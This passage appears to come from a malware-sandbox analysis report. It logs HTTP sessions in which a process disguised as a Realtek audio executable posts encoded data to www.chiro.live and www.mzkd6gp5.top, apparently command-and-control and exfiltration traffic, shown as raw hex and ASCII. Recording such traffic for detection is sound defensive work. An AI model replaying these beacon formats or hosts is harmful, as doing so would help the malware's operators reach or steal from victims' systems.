                                                                          Data Ascii: 266SMs0WPv6vl@:g8N0dX"B N:1Pv}d~WP!2dWgaS[K\:SePu,K@KK}\?D4]#(H3*Ppy;ZmI6!<%Ib!QYJX#aKopJLK:e\$0<w1~qBj-.Y~_4-~Ek!MYW0`L_"8Y*eEB]wR@*o-K+5(~)G"oJ5|ob)Q@A)E~iZ1 &tN;xW[8O{S{Z0|74Y:Pup.z9.Bc8"A5vO30YJ8I;'h2/'&,ow3<Eghg"GmzN6(w p|[d[]oE5x8}gzt~[Vv)KA0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.11.2049747198.58.118.167807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:46.107495070 CET809OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
                                                                          Jan 9, 2025 16:47:46.253424883 CET805INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:46 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 fc 1d 1a 48 27 71 fd 59 62 27 8e 13 b0 2f 19 21 29 96 88 90 28 08 b0 d3 e9 7f 2f 98 4e 4c c7 3d 54 07 a4 5d 76 df ee 7b 2b 59 1f be 2d 06 ab f5 dd 50 21 32 64 57 67 56 b9 29 0c f0 ad ad 62 ae 5e 9d 29 c5 b2 08 06 a8 3a 1e cc 10 4b a0 40 02 e2 04 4b 5b 7d 5c 8d 1a 17 7f 22 8f bf 89 94 51 03 ff 48 69 66 ab bb 46 0a 1a 50 84 11 90 d4 67 58 55 a0 e0 12 f3 22 77 3a b4 31 da e2 93 6c 0e 42 6c ab 19 c5 79 24 62 59 4b c8 29 92 c4 46 38 a3 10 37 0e c6 67 85 72 2a 29 60 8d 04 02 86 ed a6 66 d4 e1 24 95 0c 5f 59 7a b5 1f e8 1c 9a e4 22 81 31 8d e4 91 d6 bf 7b 8f f1 4b 8c 13 52 6b c1 b8 4c 63 66 97 fc be e8 7a 9e e7 7d 43 83 84 c6 42 63 34 c3 ba aa e8 47 48 4b 3f 2d 63 1d d4 ab cb 73 5a a2 fb 7f 25 2c fd 38 18 cb 17 68 af 08 ce 04 40 b6 8a c4 73 75 fc f8 a9 2e 46 45 59 91 fb a8 50 57 e2 9d d4 03 90 81 ca 5b 8b 2b 95 78 49 39 94 54 70 a5 06 a5 fc 7c d7 af 0c 29 57 4e 39 12 b9 26 45 a4 31 01 8b f9 0a ae 91 82 90 62 2b ea [TRUNCATED]
                                                                          Data Ascii: 265SMs0WPvH'qYb'/!)(/NL=T]v{+Y-P!2dWgV)b^):K@K[}\"QHifFPgXU"w:1lBly$bYK)F87gr*)`f$_Yz"1{KRkLcfz}CBc4GHK?-csZ%,8h@su.FEYPW[+xI9Tp|)WN9&E1b+Q@AnIISf^O3~c;YtA+ut8O{`)x3i4Yz6j;\o9.Bc8"b;K',?8I;'h2/;'k&,X{ou2<n&t.0dzP.<{ wwtqZ(rGiGAU9T/wWRtu0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.11.2049748198.58.118.167807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:49.788150072 CET2578OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 30 46 47 6d [TRUNCATED]
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/NxvCSJU [TRUNCATED]
                                                                          Jan 9, 2025 16:47:49.788182974 CET2578OUTData Raw: 66 67 43 74 73 70 4a 53 45 49 70 52 70 72 2f 48 69 52 6b 78 6d 79 35 75 6a 46 79 53 6a 2f 5a 4b 52 56 74 56 6d 2f 63 75 63 37 48 54 61 31 36 4c 47 66 72 37 31 76 75 4f 4e 53 74 61 53 37 4f 6a 63 38 34 51 4b 59 46 4e 67 61 55 76 33 62 38 64 42 32
                                                                          Data Ascii: fgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP/+PH
                                                                          Jan 9, 2025 16:47:49.930634022 CET2578OUTData Raw: 35 55 2b 43 79 45 75 45 51 31 77 55 69 58 6e 72 33 41 34 75 48 34 58 6c 67 69 64 6e 67 4f 4c 4e 32 39 57 73 51 66 6f 51 6f 6a 43 52 53 41 46 2f 43 6f 73 75 6c 76 37 2b 70 73 6b 53 78 5a 62 58 6c 43 75 62 73 38 5a 4e 7a 2f 4a 63 49 4e 70 71 4e 30
                                                                          Data Ascii: 5U+CyEuEQ1wUiXnr3A4uH4XlgidngOLN29WsQfoQojCRSAF/Cosulv7+pskSxZbXlCubs8ZNz/JcINpqN0M4TtiBYRyuz0RvFO3/THwjc+ckTZ1NhLLnRJfQ4vCdwQhqSRB+byu2p7auCzx3QGFA0VM+/5hai+TXzq/p5zP72ktokSXb8nx4itjkJla+HgDlZJPPbSHC2fBTzww1xAHp3thAvL5goGlH8XgwaEcdF/VKsA+KKgL
                                                                          Jan 9, 2025 16:47:49.930962086 CET224OUTData Raw: 30 4b 55 79 43 62 69 32 37 61 53 34 37 42 46 44 58 6a 41 63 61 49 46 58 6a 47 30 72 2b 72 74 6d 34 75 47 63 63 35 35 6f 51 6a 32 6d 30 2b 51 63 42 55 67 6a 77 37 69 68 39 4c 64 4e 71 34 34 73 51 76 4b 30 63 6d 74 4a 71 62 4e 6b 50 51 4e 6f 4c 68
                                                                          Data Ascii: 0KUyCbi27aS47BFDXjAcaIFXjG0r+rtm4uGcc55oQj2m0+QcBUgjw7ih9LdNq44sQvK0cmtJqbNkPQNoLh+HkBJ3bRFA/xpF6U3u2fMq0sjEvKJlKY70yp7HHRhWwzdG0Z4sVmqalNqCs6VhNOQvqCMMQujKJ18jxGadP3DaO+4WxEoc7WyzxI45ouchaVw28pEzF6GqgEV/cO6LFhCLk1zwXt1STQ==
                                                                          Jan 9, 2025 16:47:50.075325966 CET805INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 0c 76 7c 69 20 9d 84 fa 5a 62 27 8e 13 6c bf 64 84 a4 58 22 42 a2 20 c0 4e a7 ff 5e 2e 9d 98 8e fb 50 3d 20 ed b2 7b 76 cf 59 c9 fc f0 6d 61 af 36 77 43 85 c8 80 5d 9d 99 c5 a6 30 c0 77 96 8a b9 7a 75 a6 e4 cb 24 18 a0 ea 58 9a 01 96 40 81 04 44 31 96 96 fa b8 1a 35 fa 7f 22 8f bf 89 94 61 03 ff 48 68 6a a9 fb 46 02 1a 50 04 21 90 d4 63 58 55 a0 e0 12 f3 3c 77 3a b4 30 da e1 93 6c 0e 02 6c a9 29 c5 59 28 22 59 4b c8 28 92 c4 42 38 a5 10 37 4a e3 b3 42 39 95 14 b0 46 0c 01 c3 96 de 6c d5 e1 24 95 0c 5f 99 5a b5 97 74 ca 26 b9 88 61 44 43 79 a4 f5 ef de 23 fc 12 e1 98 d4 5a 68 5d 26 11 b3 0a 7e 5f 34 2d cb b2 5e ab 09 09 8d 44 93 d1 14 6b aa a2 1d 21 4d ed b4 8c 59 aa 57 97 e7 b4 c4 c5 ff 95 30 b5 e3 60 4c 4f a0 83 22 38 13 00 59 2a 12 cf d5 f1 e3 a7 ba 18 15 65 45 1e c2 5c 5d 89 f7 52 f3 41 0a 2a 6f 2d ae 50 e2 25 e1 50 52 c1 95 1a 94 f2 f3 5d bf 22 a4 58 19 e5 48 64 4d 29 c2 26 13 30 9f af e0 4d 92 13 52 2c [TRUNCATED]
                                                                          Data Ascii: 265Sr0}WP2Lmv|i Zb'ldX"B N^.P= {vYma6wC]0wzu$X@D15"aHhjFP!cXU<w:0ll)Y("YK(B87JB9Fl$_Zt&aDCy#Zh]&~_4-^Dk!MYW0`LO"8Y*eE\]RA*o-P%PR]"XHdM)&0MR,E=JT.s??IBNlzG >t7Wtqxval3i4YfOQ`.z:>Dc8"~5nOS0YJ8;'hR:_v<773^IX\8c&7.b121t5Sd<QhCwl~nu,Nk%[^nQ*g~2U7/]+_oZk0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.11.2049749198.58.118.167807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:52.461357117 CET528OUTGET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:47:52.606264114 CET1289INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:52 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          connection: close
                                                                          Data Raw: 34 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                          Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437672.0002114916&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJsVj1uYkViNkJhcGpyQ1lkM3ZwSVU2NWRSVGFvUEsyYzQ4NFo5RExlbFRjcko0cDhoT2lCcGxJMzl6dHpoYWFsNzZxRllLZThvb0pGMjJtSS9KdlJQUjlLWnRFUHNHUFNadnBIejRnS1JiOVJIdGl2ODdTWnd4TXlJaz0mTFNiYVQ9emZ0NExvQnciLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
                                                                          Jan 9, 2025 16:47:52.606270075 CET52INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: } </script> </body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.11.2049750104.21.96.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:57.918406963 CET795OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d
                                                                          Data Ascii: lV=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
                                                                          Jan 9, 2025 16:47:58.492090940 CET820INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:47:58 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oi9rZc1DajXu1cLSVCN7jLyQ0aRms2gZLp75UQAdmOBAl%2FnlViuBI%2FP6bavjHK%2FBc19EvmEP%2B8Jebj5TPgTCOybMbJhDkVvHqHCqAKCSNYm1segd3upbK2Cayc8M9%2Bio26BT"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5919f6c076075-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118823&min_rtt=118823&rtt_var=59411&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                          Data Ascii: f
                                                                          Jan 9, 2025 16:47:58.492100954 CET105INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                          Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:47:58.492109060 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.11.2049751104.21.96.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:00.565758944 CET815OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
                                                                          Jan 9, 2025 16:48:01.112435102 CET913INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:01 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXhyTWjNyFWLhCq5LJQ0mJ1gXWo415ILhjEOrR%2BMXrpKAw1%2FL7GYDUIKWJKg%2B7YEDrue1SLJyti%2Bd0cIvAcyyTyTD5EgOn3DpsiSUPX03ar1byJ4HZ27nn9LC587PAUEFgi7"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591affb8fa482-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=120227&min_rtt=120227&rtt_var=60113&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:48:01.112481117 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.11.2049752104.21.96.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:03.222157001 CET7964OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
